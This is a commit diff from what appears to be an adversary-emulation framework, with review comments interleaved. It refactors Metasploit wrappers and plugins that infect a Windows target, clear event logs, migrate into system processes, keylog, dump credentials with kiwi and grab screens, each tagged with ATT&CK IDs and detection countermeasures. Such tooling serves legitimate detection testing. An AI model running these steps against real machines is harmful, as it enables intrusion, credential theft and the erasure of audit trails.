Fixed several issues in metasploit attacks

Thorsten Sick 3 years ago
parent 0cf8400eae
commit ac482e8b9e

@ -600,29 +600,41 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
result=res)
return res
def clearev(self, target):
def clearev(self, target, **kwargs):
""" Clears windows event logs """
command = "clearev"
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
tactics = "Defense Evasion"
tactics_id = "TA0005"
description = """
Clear windows event logs to hide tracks
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="clearev",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def screengrab(self, target):
def screengrab(self, target, **kwargs):
""" Creates a screenshot
Before using it, migrate to a process running while you want to monitor.
@ -631,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
command = "screengrab"
ttp = "T1113" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Do screen grabbing to collect data on target
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="screengrab",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on(["use espia"], target)
print(res)
res = self.meterpreter_execute_on([command], target)
@ -647,10 +670,11 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def keylogging(self, target, monitoring_time):
def keylogging(self, target, monitoring_time, **kwargs):
""" Starts keylogging
Before using it, migrate to a process running while you want to monitor.
@ -658,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
"winlogon.exe" will monitor user logins. "explorer.exe" during the session.
@param monitoring_time: Seconds the keylogger is running
@param monitoring_time: The time to monitor the keys. In seconds
"""
command = "keyscan_start"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Log keys to get passwords and other credentials
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="keylogging",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
print(res)
time.sleep(monitoring_time)
@ -680,54 +714,80 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res
def getuid(self, target):
def getuid(self, target, **kwargs):
""" Returns the UID
"""
command = "getuid"
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
tactics = "Collection"
tactics_id = "TA0009"
description = """
Get user id
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="getuid",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res[0]
def sysinfo(self, target):
def sysinfo(self, target, **kwargs):
""" Returns the sysinfo
"""
command = "sysinfo"
ttp = "T1082" # It uses one out of three different ways to elevate privileges.
tactics = "Discovery"
tactics_id = "TA0007"
description = """
Get basic system information
"""
self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp)
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
name="sysinfo",
description=description,
tactics=tactics,
tactics_id=tactics_id,
situation_description=kwargs.get("situation_description", None),
countermeasure=kwargs.get("countermeasure", None))
res = self.meterpreter_execute_on([command], target)
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
target=target.get_ip(),
metasploit_command=command,
ttp=ttp,
logid=logid,
result=res)
return res[0]
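Review bot: `getuid` (new side, the `ttp`/`tactics`/`tactics_id` lines right after `command = "getuid"`) carries the keylogging classification — T1056.001, Collection, TA0009 — so every getuid run is logged as input capture; the Discovery values `sysinfo` uses are the ones that fit, e.g. `ttp = "T1033"`, `tactics = "Discovery"`, `tactics_id = "TA0007"`. The trailing comment `# It uses one out of three different ways to elevate privileges.` is repeated on the `ttp` line of all five methods although none of them elevates privileges; it should be dropped or replaced by the technique name. The `print(res)` calls in clearev, screengrab and keylogging bypass `attack_logger.vprint`, which every other message in these methods goes through, so their output escapes the verbosity control. `getuid` and `sysinfo` return `res[0]` without checking that `meterpreter_execute_on` returned a non-empty list; whether it can be empty is not visible here.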

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitClearevPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitClearevPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target)
self.metasploit.clearev(target)
return res
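Review bot: The file header `# A plugin to nmap targets slow motion, to evade sensors` on the first line of this section describes a different plugin; the same stale header appears in every plugin file of this commit (getsystem, getuid, keylogging, kiwi, migrate, ps, screengrab, sysinfo) and should be replaced per file, here with `# A plugin that clears the Windows event logs on the target through meterpreter (T1070.001)`. The added `requirements = [Requirement.METASPLOIT]` has no comment while `required_files` next to it does; since the plugin now relies on `self.metasploit` instead of building a `MetasploitInstant` itself, a comment such as `# Framework services this plugin needs; presumably what provisions self.metasploit — confirm against AttackPlugin` would record the link. `res` is assigned outside the hunk, so its value is not visible, but the result of `self.metasploit.clearev(target)` is dropped, so `return res` cannot reflect whether the log clearing succeeded; the same pattern is in the getsystem, keylogging, kiwi, migrate, ps and screengrab run hunks.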

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitGetsystemPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -33,27 +35,22 @@ class MetasploitGetsystemPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
# TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
self.metasploit.getsystem(target,
variant=self.conf['variant'],
situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
)
return res
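Review bot: `variant=self.conf['variant']` in the `self.metasploit.getsystem(...)` call (and the same line in the kiwi plugin) reads the config key with no default and no check, so a config file that omits it fails with a bare KeyError from inside run, after the target has already been infected. A guard before the `smart_infect` call would fail early with a message naming the key, e.g. `if 'variant' not in self.conf:` followed by `raise ValueError("getsystem plugin: config key 'variant' is required")` — substitute the project's own exception type if one exists; whether getsystem accepts a missing variant is not visible here. The `# TODO:` link above the call is left without saying what is still to do; one clause stating the open item would make it actionable.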

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,19 +33,15 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, name="winlogon.exe")
self.metasploit.migrate(target, name="winlogon.exe")
metasploit.keylogging(target, monitoring_time=20)
self.metasploit.keylogging(target, monitoring_time=20)
return res
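Review bot: `monitoring_time=20` on the `self.metasploit.keylogging(...)` line is a bare magic number; the keylogger runs for exactly 20 seconds with nothing saying why, and the getsystem and kiwi plugins already take their parameters from `self.conf`, so this one could too. At minimum name it at class level, `KEYLOG_SECONDS = 20  # how long the keylogger runs on the target`, and pass `monitoring_time=KEYLOG_SECONDS`. The `self.metasploit.migrate(target, name="winlogon.exe")` line deserves a why-comment, since the keylogging docstring in the first section of this commit says winlogon.exe only captures user logins while explorer.exe captures the session: `# winlogon.exe captures logon keystrokes only; use explorer.exe for an active session (see MetasploitInstant.keylogging)`.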

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitKiwiPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -33,25 +35,21 @@ class MetasploitKiwiPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
lhost=ip,
format="exe",
outfile=payload_name)
self.metasploit.kiwi(target,
variant=self.conf['variant'],
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
countermeasure="Memory access into critical processes should be monitored."
)
return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
import socket
@ -17,6 +17,8 @@ class MetasploitMigratePlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -32,14 +34,9 @@ class MetasploitMigratePlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
architecture="x64",
platform="windows",
@ -48,6 +45,6 @@ class MetasploitMigratePlugin(AttackPlugin):
outfile=payload_name
)
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64")
return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitPsPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,17 +33,12 @@ class MetasploitPsPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.ps_process_discovery(target)
self.metasploit.ps_process_discovery(target)
return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,19 +33,14 @@ class MetasploitScreengrabPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
metasploit.screengrab(target)
self.metasploit.screengrab(target)
return res

@ -2,7 +2,7 @@
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.metasploit import MetasploitInstant
@ -16,6 +16,8 @@ class MetasploitSysinfoPlugin(AttackPlugin):
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
@ -31,18 +33,13 @@ class MetasploitSysinfoPlugin(AttackPlugin):
payload_name = "babymetal.exe"
target = self.targets[0]
metasploit = MetasploitInstant(self.metasploit_password,
attack_logger=self.attack_logger,
attacker=self.attacker_machine_plugin,
username=self.metasploit_user)
metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target)
si = self.metasploit.sysinfo(target)
print(f"Sysinfo: {si}")
return res
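Review bot: `print(f"Sysinfo: {si}")` right after the `si = self.metasploit.sysinfo(target)` line writes to stdout directly, while MetasploitInstant routes its own messages through `self.attack_logger.vprint(msg, level)` and the plugin already holds `self.attack_logger`; `self.attack_logger.vprint(f"Sysinfo: {si}", 1)` keeps the output under the same verbosity control and in the same log. `res` is set outside the hunk, so its value is not visible, but the sysinfo result is only printed and never returned or recorded, so the plugin's caller never sees it.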
